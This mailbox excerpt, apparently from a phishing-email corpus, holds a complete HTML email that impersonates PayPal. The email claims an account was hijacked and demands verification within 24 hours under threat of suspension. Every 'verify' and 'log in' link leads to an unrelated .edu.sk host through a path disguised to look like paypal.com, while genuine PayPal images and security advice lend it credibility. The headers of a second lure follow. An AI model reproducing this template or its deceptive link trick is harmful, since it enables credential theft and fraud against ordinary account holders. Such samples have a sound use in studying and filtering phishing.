From: "service@paypal.com" <service@paypal.com>
Reply-To: "service@paypal.com" <service@paypal.com>
To: nobody@example.com
Subject: Resolution Center Steps to Remove Limitations
Date: Mon, 05 Jun 2006 13:39:10 -0100
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--0391766454561692375"
X-Priority: 1
X-MSMail-Priority: High
Status: 
X-Status: 
X-Keywords:                   

----0391766454561692375
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D600 align=3Dcenter border=3D=
0>
<TBODY>
<TR vAlign=3Dtop>
<TD><A href=3D"http://gvarza.edu.sk/ipstats/..%20/www.paypal.com/" target=3D=
_blank><IMG height=3D35 alt=3DPayPal src=3D"http://images.paypal.com/en_US=
/i/logo/email_logo.gif" width=3D255 border=3D0></A> </TD></TR></TBODY></TA=
BLE>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0>
<TBODY>
<TR>
<TD width=3D"100%" background=3Dhttp://images.paypal.com/images/bg_clk.gif=
><IMG height=3D29 src=3D"http://images.paypal.com/images/pixel.gif" width=3D=
1 border=3D0></TD></TR>
<TR>
<TD><IMG height=3D10 src=3D"http://images.paypal.com/images/pixel.gif" wid=
th=3D1 border=3D0></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D600 align=3Dcenter border=3D=
0>
<TBODY>
<TR vAlign=3Dtop>
<TD width=3D400>
<TABLE cellSpacing=3D0 cellPadding=3D5 width=3D"100%" border=3D0>
<TBODY>
<TR vAlign=3Dtop>
<TD>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0>
<TBODY>
<TR>
<TD class=3Dpp_heading align=3Dleft><BR>Security Center Advisory!</TD></TR=
></TBODY></TABLE></TD></TR>
<TR>
<TD><BR>We recently noticed one or more attempts to log in to your PayPal =
account from a foreign IP address and we have reasons to belive that your =
account was hijacked by a third party without your authorization. If you r=
ecently accessed your account while traveling, the unusual log in attempts=
 may have been initiated by you.<BR><BR>If you are the rightful holder of =
the account you must <B>click the link below</B> in 24 hours after you rec=
eive this mail and then complete all steps from the following page as we t=
ry to verify your identity.<BR><BR>
<TABLE cellSpacing=3D0 cellPadding=3D1 width=3D"75%" align=3Dleft bgColor=3D=
#ffe65c border=3D0>
<TBODY>
<TR>
<TD>
<TABLE cellSpacing=3D0 cellPadding=3D4 width=3D"100%" align=3Dcenter bgCol=
or=3D#fffecd border=3D0>
<TBODY>
<TR>
<TD class=3Dpp_sansserif align=3Dmiddle><A href=3D"http://gvarza.edu.sk/ip=
stats/..%20/www.paypal.com/" target=3D_blank><FONT color=3D#003399>Click h=
ere to verify your account</FONT></A></TD></TR></TBODY></TABLE></TD></TR><=
/TBODY></TABLE><BR><BR><BR><BR>If you choose to ignore our request, you le=
ave us no choise but to temporaly suspend or deleted your account.<BR><BR>=
Thank you for using PayPal! The PayPal Team </TD></TR>
<TR>
<TD>
<HR class=3Ddotted>
</TD></TR>
<TR>
<TD>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0>
<TBODY>
<TR>
<TD class=3Dpp_footer>Please do not reply to this e-mail. Mail sent to thi=
s address cannot be answered. For assistance, <A href=3D"http://gvarza.edu=
sk/ipstats/..%20/www.paypal.com/" target=3D_blank><FONT color=3D#003399>l=
og in</FONT></A> to your PayPal account and choose the "Help" link in the =
footer of any page.<BR><BR class=3Dh10>To receive email notifications in p=
lain text instead of HTML, update your preferences <A href=3D"https://www.=
paypal.com/row/PREFS-NOTI" target=3D_blank><FONT color=3D#003399>here</FON=
T></A>. </TD></TR>
<TR>
<TD><IMG height=3D10 src=3D"http://images.paypal.com/en_US/i/scr/pixel.gif=
" width=3D1 border=3D0></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD><BR><SPAN class=3Dpp_footer>PayPal Email ID PP697</SPAN></TD></TR></TB=
ODY></TABLE></TD>
<TD><IMG height=3D1 src=3D"http://images.paypal.com/en_US/i/scr/pixel.gif"=
 width=3D10 border=3D0></TD>
<TD vAlign=3Dtop width=3D190>
<TABLE cellSpacing=3D0 cellPadding=3D1 width=3D"100%" bgColor=3D#cccccc bo=
rder=3D0>
<TBODY>
<TR>
<TD>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%" bgColor=3D#ffffff bo=
rder=3D0>
<TBODY>
<TR>
<TD>
<TABLE cellSpacing=3D0 cellPadding=3D5 width=3D"100%" bgColor=3D#eeeeee bo=
rder=3D0>
<TBODY>
<TR>
<TD class=3Dpp_sidebartextbold align=3Dmiddle>Protect Your Account Info</T=
D></TR></TBODY></TABLE>
<TABLE cellSpacing=3D0 cellPadding=3D5 width=3D"100%" border=3D0>
<TBODY>
<TR>
<TD class=3Dpp_sidebartext><BR>Make sure you never provide your password t=
o fraudulent persons. <BR><BR>PayPal automatically encrypts your confident=
ial information using the Secure Sockets Layer protocol (SSL) with an encr=
yption key length of 128-bits (the highest level commercially available).<=
BR><BR>PayPal will never ask you to enter your password in an email.<BR><B=
R>For more information on protecting yourself from fraud, please review ou=
r Security Tips at http://www.paypal.com/securitytips<BR><IMG height=3D5 s=
rc=3D"http://images.paypal.com/images/pixel.gif" width=3D1 border=3D0> </T=
D></TR></TBODY></TABLE></TD></TR>
<TR>
<TD>
<TABLE cellSpacing=3D0 cellPadding=3D5 width=3D"100%" bgColor=3D#eeeeee bo=
rder=3D0>
<TBODY>
<TR>
<TD class=3Dpp_sidebartextbold align=3Dmiddle>Protect Your Password</TD></=
TR></TBODY></TABLE>
<TABLE cellSpacing=3D0 cellPadding=3D5 width=3D"100%" border=3D0>
<TBODY>
<TR>
<TD class=3Dpp_sidebartext>You should <SPAN class=3Dppem106>never</SPAN> g=
ive your PayPal password to anyone, including PayPal employees.<BR><IMG he=
ight=3D5 src=3D"http://images.paypal.com/en_US/i/scr/pixel.gif" width=3D1 =
border=3D0></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR><=
/TBODY></TABLE></TD></TR></TBODY></TABLE>

----0391766454561692375--

From student@saerc.tv  Mon Jun  5 14:11:06 2006
Return-Path: <student@saerc.tv>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.5.6.7])
	by funky.example.com (Postfix) with ESMTP id EF5C546987
	for <nobody@login.example.com>; Mon,  5 Jun 2006 14:11:05 -0400 (EDT)
Received: from saerc.tv (saerc.tv [24.224.173.34])
	by mail1.example.com (Postfix) with ESMTP id BC16D6CD093
	for <nobody@example.com>; Mon,  5 Jun 2006 14:11:05 -0400 (EDT)
Received: by saerc.tv (Postfix, from userid 2632)
	id 090E744700D; Mon,  5 Jun 2006 15:00:40 -0300 (ADT)
To: nobody@example.com
Subject: Action Required - Your Account Has Been Limited !
